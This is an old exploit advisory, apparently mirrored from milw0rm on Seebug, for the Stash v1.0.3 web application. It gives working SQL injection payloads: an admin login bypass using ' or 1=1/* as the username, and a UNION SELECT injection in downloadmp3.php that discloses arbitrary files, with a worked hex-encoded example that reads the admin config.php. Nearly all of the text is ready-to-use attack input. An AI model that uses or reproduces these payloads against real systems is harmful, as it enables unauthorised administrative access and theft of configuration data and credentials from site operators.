##################################################################################### #### Stash v1.0.3 Admin bypass / Remote File Disclosure #### ##################################################################################### # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # ##################################################################################### # # #Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz# # # #DORK : :( # # # ##################################################################################### # [Admin by pass] # # # #http://Site/[path]/admin/login # #Username : ' or 1=1/* # #Password : R3d.W0rm # # # ##################################################################################### # [Remote File Disclosure] # # # #http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/* # # #Note : You must enter file name in hex in valun address to download it . # #Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870 # #http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/* # # ##################################################################################### # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### # milw0rm.com [2008-09-09]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论